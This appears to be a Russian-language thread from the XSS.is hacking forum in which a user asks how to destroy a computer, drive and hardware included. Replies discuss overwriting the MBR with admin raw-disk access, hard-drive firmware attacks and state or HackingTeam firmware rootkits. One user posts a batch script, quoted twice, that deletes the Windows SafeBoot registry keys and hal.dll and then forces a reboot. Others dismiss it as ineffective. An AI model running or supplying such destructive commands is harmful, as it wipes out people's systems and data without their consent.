• XSS.stack #1 – первый литературный журнал от юзеров форума

Убить комп наглухо

Dendy

(L3) cache
Пользователь
Реакции
63
может было, не нашел.

как убить комп, чтобы и хард, и что нибудь еще прихватить.
вот намертво прям.

есть такой софт ?

PS, только в исследовательских целях.

раньше помню был скрипт, когда его открывали-то видюха сгорала почему то. На скам сайтах распространяли ее

Пока я вижу список дурачков )))
1) кто даст писать в MBR? никто, ни ОС ни bios"
2) "тут просто mbr + bios затереть" ))))
3) "видюха сгорала почему то" ну да в 1995 примерно )))

Пожалуйста, обратите внимание, что пользователь заблокирован
Можно попробовать прошивку жесткого сломать, но там надо делать это с ядра через hal и реверсить конкретный протокол DFU конкретного жесткого, который он использует для обновления прошивок.
Можно у анб подглядеть, я когда смотрел там через хал как раз было в ядре, они кастомную прошивку ставили для аппаратного руткита

Но стоить это будет от 100к баксов и выше, сами понимаете. Это фулл андок и чтобы исполнить этот код еще нужны зеродеи чтобы в ядро залезть. При условии что найдете кто такое запилит

500mhz
>
1) кто даст писать в MBR? никто, ни ОС ни bios"

извини... На семере 32 бит можно с юзермода с правами админа в роу режиме открыть physical drive и первые 512 байт это мбр. Далее защищено драйвером, но не защищено от перезаписи из кернелмода. Биос тут вообще причем? Трукрипт по твоему как ставит бутлоадер?

Другое дело что мбр на новых компах нет уже лет 6

2)3) С остальным согласен, про затереть биос тоже поржал

Последнее редактирование:
навредить железу уже давно нельзя, максимум можешь его перегреть, но оно само отрубится, так как стоят датчики ^_^

Грохнет вин 7 (запускать батник от рута)

off
Reg Delete HKLM\System\CurrentControlSet\Control\SafeBoot\*.* /q
Reg Delete HKLM\System\CurrentControlSet\Control\SafeBoot /q
del %WinDir%\system32\hal.dll /q
msg * Bad
shutdown -r -t 00 -c 1

Грохнет вин 7 (запускать батник от рута)

off
Reg Delete HKLM\System\CurrentControlSet\Control\SafeBoot\*.* /q
Reg Delete HKLM\System\CurrentControlSet\Control\SafeBoot /q
del %WinDir%\system32\hal.dll /q
msg * Bad
shutdown -r -t 00 -c 1
Ты смысл тобой написаного понимаеш?
1) HKLM\System\CurrentControlSet\Control\SafeBoot . ну нет safeboot,убил ос типа? ))
2) del %WinDir%\system32\hal.dll /q . восстановит из рековери это раз, ну а во вторых пока она загружена, RO будет

свой год рождения писать не надо, а то что я написал было около 4-лет назад

чуть побольше бы уважения к старичку. 500мхз в теме больше чем ты говорить умеешь

Мне кажется с учетом развития технологий, всякие там попытки перегрева будут пресечены на аппаратном уровне, просто комп вырубится.
Другой вопрос если при наличии root/admin можно попытаться грохнуть прошивку к примеру HD, но опять же все HD разные ) и соотвественно low level коды у всех разные.
Как пример у всем известной HackingTeam были разработки по персистенсу в прошивке HD и UEFI, но только для определенной модели ноутбука.

Как пример у всем известной HackingTeam были разработки по персистенсу в прошивке HD
Можно линк на персистенс в прошивке жесткого диска? Насколько знаю такие технологии есть только у АНБ.

Напишите ответ...
  • Вставить:
Прикрепить файлы
Верх